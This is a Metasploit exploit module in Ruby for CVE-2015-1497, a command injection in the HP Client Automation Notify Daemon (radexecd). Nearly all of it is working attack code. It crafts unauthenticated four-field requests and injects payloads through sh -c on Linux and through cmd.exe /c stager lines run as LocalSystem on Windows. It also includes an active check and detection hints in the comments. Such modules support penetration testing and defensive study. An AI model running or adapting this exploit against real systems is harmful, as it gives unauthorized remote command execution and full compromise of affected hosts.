Path: blob/master/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# HP Client Automation (Persistent Systems Client Automation) Notify Daemon
# command injection, CVE-2015-1497 / ZDI-15-038.
#
# Every request this module sends to the daemon is the same four-field frame,
# each field NUL-terminated: port, user ID, password, command. The password
# field is random text in every method below, which is what the Description
# means by the daemon not authenticating execution requests by default; the
# References URL is the vendor guidance on hardening the RBAC / Remote Notify
# features. From a detection standpoint: the default port is RPORT 3465 (see
# register_options) and both exploit paths send a command field beginning with
# the literal `hide hide`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager # the Windows target is staged through execute_command below

  # Module metadata, targets and options.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Client Automation Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability on HP Client Automation, distributed
        actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
        Daemon (radexecd.exe), which doesn't authenticate execution requests by default.

        This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2
        and CentOS 5.
      },
      'Author'         =>
        [
          'Ben Turner', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1497'],
          ['ZDI', '15-038'],
          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
        ],
      'Privileged'     => true,
      'Platform'       => %w{ unix win },
      'DefaultOptions' =>
        {
          # exploit_unix never reads a reply, so the session wait is the only
          # success signal on Linux — presumably why this is set here.
          'WfsDelay' => 10
        },
      'Payload'        => {'DisableNops' => true},
      'Targets'        =>
        [
          [ 'HP Client Automation 9.0.0 / Linux',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
                {
                  'Space' => 466,
                  'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
                  'Compat' =>
                    {
                      'PayloadType' => 'cmd',
                      'RequiredCmd' => 'openssl telnet generic gawk'
                    },
                  # Single quote: exploit_unix wraps the payload in sh -c '...',
                  # so a quote in the payload would break the wrapper.
                  'BadChars' => "\x27"
                }
            }
          ],
          [ 'HP Client Automation 9.0.0 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2014-01-02'))

    register_options(
      [
        Opt::RPORT(3465)
      ])

    # Flavor and decoder are fixed by the exploit method (see execute_cmdstager
    # call), so the user cannot change them.
    deregister_options('CMDSTAGER::FLAVOR')
    deregister_options('CMDSTAGER::DECODER')
  end

  # Active check: submits a `hide` request with random credentials and reports
  # Detected when the daemon answers with a leading 0x00 status byte. This is
  # not a passive banner grab — the daemon receives (and may log) a request
  # shaped like the exploit traffic.
  #
  # @return [Msf::Exploit::CheckCode] Detected or Safe
  def check
    connect
    sock.put("\x00") # port
    sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID (random)
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password (random; not validated by the daemon per Description)
    sock.put("hide\x00") # command
    res = sock.get_once
    disconnect

    # A first reply byte of 0 is treated as acceptance; a nil reply
    # (timeout / no data) falls through to Safe.
    if res && res.unpack('C')[0] == 0
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Dispatches on the selected target's platform: Windows goes through the
  # CmdStager (VBS flavor, 290-character lines), which calls execute_command
  # once per line; Linux sends the encoded payload in a single request.
  def exploit
    case target['Platform']
    when 'win'
      print_status('Exploiting Windows target...')
      execute_cmdstager({:flavor => :vbs, :linemax => 290})
    when 'unix'
      print_status('Exploiting Linux target...')
      exploit_unix
    else
      fail_with(Failure::NoTarget, 'Invalid target')
    end
  end

  # Linux path: one request whose command field embeds the encoded payload in
  # `sh -c '...'`. Backslashes in the payload are doubled by the gsub and the
  # single quote is excluded via the target's BadChars, so the payload stays
  # inside the quoting. The reply is never read, so success is only observable
  # through the session wait (WfsDelay).
  def exploit_unix
    connect
    sock.put("\x00") # port
    sock.put("0\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password (random)
    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
    disconnect
  end

  # CmdStager callback for the Windows target: runs one stager line through
  # `cmd.exe /c`. The user ID sent is S-1-5-18, the well-known LocalSystem
  # SID, consistent with 'Privileged' => true. Unlike exploit_unix this reads
  # the reply and aborts unless its first byte is 0, so a refused line stops
  # the stager instead of silently continuing.
  #
  # @param cmd [String] stager command line to execute
  # @param opts [Hash] CmdStager options; unused here (presumably required by the callback signature)
  # @raise via fail_with [Failure::Unknown] when no reply or a non-zero first byte is received
  def execute_command(cmd, opts = {})
    connect
    sock.put("\x00") # port
    sock.put("S-1-5-18\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password (random)
    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
    res = sock.get_once
    disconnect
    unless res && res.unpack('C')[0] == 0
      fail_with(Failure::Unknown, "Something failed executing the stager...")
    end
  end
end